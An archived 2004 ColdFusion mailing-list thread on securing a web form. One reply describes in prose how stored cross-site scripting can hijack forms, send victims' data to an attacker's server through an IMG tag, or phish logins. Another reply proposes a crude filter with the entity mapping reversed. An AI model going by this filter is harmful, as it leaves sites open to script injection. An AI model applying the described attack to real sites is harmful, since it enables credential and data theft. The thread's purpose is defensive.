Re: [ cf-dev ] Tips on securing a form.

[Damian Watson]

Matt, which bit of code is it?? Can't find it!

Matt Horn wrote:

the solution is simple

strip out javascript and HTML from form posts
by replacing < and > with &gt; and &lt; and the word 'javascript' with  java
script or something

that way if code is posted it will be rendered ineffective

cflib has a bit of code to do just that AFAIK

HTH

Matt

----- Original Message ----- From: "Russ Michaels (Snake)" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Wednesday, September 08, 2004 10:10 AM
Subject: RE: [ cf-dev ] Tips on securing a form.

Yes because the javascript your putting in the form is being saved in the
database and displayed on another page. Your not altering the original

page.

This allows you to gain access to pages and data that only the person

logged

into the site should be able to see.

Russ

-----Original Message-----
From: Mark Smyth [mailto:[EMAIL PROTECTED]
Sent: 07 September 2004 17:24
To: '[EMAIL PROTECTED]'
Subject: RE: [ cf-dev ] Tips on securing a form.

Hi Russ

I'm a pit confused.  Is entering the javascript into
formfields and then altering the HTML any different than
viewing the source of a form, saving a local copy and then
altering the HTML and posting it?

Thanks
Mark

-----Original Message-----
From: Russ Michaels (Snake) [mailto:[EMAIL PROTECTED]
Sent: 07 September 2004 17:03
To: [EMAIL PROTECTED]
Subject: RE: [ cf-dev ] Tips on securing a form.

Well you make sure that SQL cannot be inserted by using
CFQUERYPARAM around
your values, so any altering of formfields or URLs's wont allow code
execution. There isn't much you can do about general text
fields as thes
eare intended for people to type text into. But as long as
you stop code
execution then nothing they put here will do any damage. You
may want to do
validation to stop ang TAGS being typed into the fields, and
stop arbitray
code from calling individual pages on your site, otherwise
people can then
use javascript and the likes to get at peoples data. An
example of this.
Lets say u have a site where you can view peoples profiles or
comments, such
as a forum for instance. In my post or comment or profile I
could put some
javascript that popped up a new window and loaded the
personal settings page
into that windows (which would load that persons setting cozz they are
logged in). Now because my code is on the calling page that
popped up that
window, I can now manipulate anything in that window, which
means I can
alter the form action to submit any form to a URL on my
server instead and
thus grab and of that persons info such as username/password
etc when they
click save, or I can just grab anything that is on that page
intitially and
use an IMG tag to send all the values as attributes to a .cfm
page on my
server. Or indeed I can popup any old page from my own server
that tells
that person they have logged out and to log back in, bam I
have their login
details. Now apply this example to sites that take orders,
store credit
details, private information about peeople and you can see
how easy it is to
steal peoples databases without the correct code in place to
stop it. I can
tell you for a start that I discovered you can do this sort
of thing with
the Worldpay payment gateway unless you implement code to avoid it.

I hope I haven't given you lot any ideas now :-)

Russ Michaels
Macromedia/Allaire Certified ColdFusion Developer

CFDeveloper
The free resource and community for ColdFusion developer.
http://www.cfdeveloper.co.uk

Join the CFDeveloper discussion lists.
To subscribe send an e-mail to [EMAIL PROTECTED]

-----Original Message-----
From: Stephen Adams [mailto:[EMAIL PROTECTED]
Sent: 07 September 2004 16:33
To: 'Dev
Subject: [ cf-dev ] Tips on securing a form.

Hi,

I have a simple form, which mainly uses drop down list, but
there are a couple of textareas and textfields. Can anyone
tell me where I can find tutorial/tips on how to
programmatically secure this form.

At the moment my for submits straight to an INSERT query, I
just want to make sure no one can attack the site through this form.

--
These lists are syncronised with the CFDeveloper forum at
http://forum.cfdeveloper.co.uk/
Archive: http://www.mail-archive.com/dev%40lists.cfdeveloper.co.uk/

CFDeveloper Sponsors and contributors:-
*Hosting and support provided by CFMXhosting.co.uk* ::
*ActivePDF provided
by activepdf.com*
     *Forums provided by fusetalk.com* :: *ProWorkFlow provided by
proworkflow.com*
          *Tutorials provided by helmguru.com* :: *Lists hosted by
gradwell.com*

To unsubscribe, e-mail: [EMAIL PROTECTED]

--
These lists are syncronised with the CFDeveloper forum at
http://forum.cfdeveloper.co.uk/
Archive: http://www.mail-archive.com/dev%40lists.cfdeveloper.co.uk/

CFDeveloper Sponsors and contributors:-
*Hosting and support provided by CFMXhosting.co.uk* ::
*ActivePDF provided by activepdf.com*
     *Forums provided by fusetalk.com* :: *ProWorkFlow
provided by proworkflow.com*
          *Tutorials provided by helmguru.com* :: *Lists
hosted by gradwell.com*

To unsubscribe, e-mail: [EMAIL PROTECTED]

--
These lists are syncronised with the CFDeveloper forum at

http://forum.cfdeveloper.co.uk/

Archive: http://www.mail-archive.com/dev%40lists.cfdeveloper.co.uk/

CFDeveloper Sponsors and contributors:-
*Hosting and support provided by CFMXhosting.co.uk* :: *ActivePDF provided

by activepdf.com*

*Forums provided by fusetalk.com* :: *ProWorkFlow provided by

proworkflow.com*

*Tutorials provided by helmguru.com* :: *Lists hosted by

gradwell.com*

To unsubscribe, e-mail: [EMAIL PROTECTED]

--
These lists are syncronised with the CFDeveloper forum at 
http://forum.cfdeveloper.co.uk/
Archive: http://www.mail-archive.com/dev%40lists.cfdeveloper.co.uk/

CFDeveloper Sponsors and contributors:-
*Hosting and support provided by CFMXhosting.co.uk* :: *ActivePDF provided by 
activepdf.com*
     *Forums provided by fusetalk.com* :: *ProWorkFlow provided by proworkflow.com*
          *Tutorials provided by helmguru.com* :: *Lists hosted by gradwell.com*

To unsubscribe, e-mail: [EMAIL PROTECTED]